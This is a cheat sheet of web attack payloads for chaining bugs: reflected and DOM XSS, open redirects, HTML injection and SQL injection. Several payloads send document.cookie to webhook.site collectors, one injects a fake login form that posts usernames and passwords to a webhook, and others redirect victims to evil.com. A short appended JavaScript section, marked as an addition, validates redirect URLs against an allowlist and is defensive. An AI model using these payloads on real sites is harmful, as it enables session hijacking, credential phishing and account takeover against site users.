Bug Chains
Reflected XSS to Account Take Over
https://xss.report/dashboard
https://bxsshunter.com/dashboard
python3 -m http.server
'"><img src="x" onerror="document.location='https://webhook.site/7165e251-2ffe-450f-9132-06f74a722e43?cookie='+document.cookie">
'"><img src=x onerror="document.location='https://webhook.site/7165e251-2ffe-450f-9132-06f74a722e43?c='+document.cookie;">
'"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>
Open Redirect to DOM XSS
redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
redirectUrl=javascript:top[/al/.source+/ert/.source](document.cookie)
redirectUrl=javascript:confirm(document.cookie)
redirectUrl=<>javascript:alert(origin);
Open Redirect to Account Take Over via Access Token
j%09avascript:document.location=%27https://webhook.site/88322504-926e-477c-a16e-5c6ba6b24b7a/%27%2bdocument.cookie
Reflected XSS to Open Redirect
'"><svg/onload="location.replace('https://evil.com')"
<script>document.location.href="https://evil.com/"</script>
<k AutoFocus contenteditable OnFocus="location.replace('https://evil.com')">
DOM XSS to Account Take Over
javascript:document.location=%27https://webhook.site/fd59355e-845b-4462-894a-c6809633adab/%27%2bdocument.cookie
HTML Injection to Phishing Steal Credentials to Account Take Over
'><h3>Please login to proceed</h3> <form action=https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>
HTML Injection to Open Redirect
"><meta http-equiv="Refresh" content="0; url='https://evil.com'"/>
SQLI to Open Redirect
0x27223E3C7376672F6F6E6C6F61643D226C6F636174696F6E2E7265706C616365282768747470733A2F2F6576696C2E636F6D272922
0x3C7376672F6F6E6C6F61643D226C6F636174696F6E2E7265706C616365282768747470733A2F2F6F70656E627567626F756E74792E6F7267272922
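Defender's counterpart to the redirectUrl values listed under the open-redirect headings above, added here as an example and not part of the original page: a prefix check on the raw string next to a parser-based allowlist check. APP_ORIGIN, ALLOWED_ORIGINS, the function names and the sample hosts are assumptions made for illustration.

```javascript
// Added example: server-side validation of a redirectUrl parameter.
// APP_ORIGIN and ALLOWED_ORIGINS are assumed values, not from the page.
const APP_ORIGIN = "https://app.example";
const ALLOWED_ORIGINS = new Set([APP_ORIGIN, "https://login.app.example"]);

// Weak check: a prefix test on the raw string.
function naiveIsSafe(value) {
  return !value.trim().toLowerCase().startsWith("javascript:");
}

// Hardened check: returns the normalized URL to redirect to, or null.
function safeRedirectTarget(value) {
  if (typeof value !== "string" || value.length > 2048) return null;
  // Control characters (tab, CR, LF), angle brackets and backslashes have no
  // place in a redirect target; URL parsers strip or reinterpret them.
  if (/[\u0000-\u001f\u007f<>\\]/.test(value)) return null;
  let url;
  try {
    url = new URL(value, APP_ORIGIN); // WHATWG parsing, as browsers do
  } catch {
    return null;
  }
  if (url.protocol !== "https:") return null;        // javascript:, data:, ...
  if (!ALLOWED_ORIGINS.has(url.origin)) return null;  // foreign or //host targets
  if (url.username || url.password) return null;      // no embedded credentials
  return url.href; // redirect to the parsed form, never the raw input
}

// Constructed samples in the shape of the values on this page, decoded once
// as a web framework would before the handler sees them.
const SAMPLES = [
  "javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain",
  "javascript:confirm(document.cookie)",
  "<>javascript:alert(origin);",
  "j%09avascript:document.location=%27https://collector.example/%27%2bdocument.cookie",
  "//evil.example/landing",
  "/account/settings",
].map((s) => decodeURIComponent(s));

// One row per sample: what each check decides.
function audit() {
  return SAMPLES.map((value) => ({
    value,
    naive: naiveIsSafe(value),
    target: safeRedirectTarget(value),
  }));
}
```

The handler should send the Location header from the returned value and fall back to a fixed default page when the result is null.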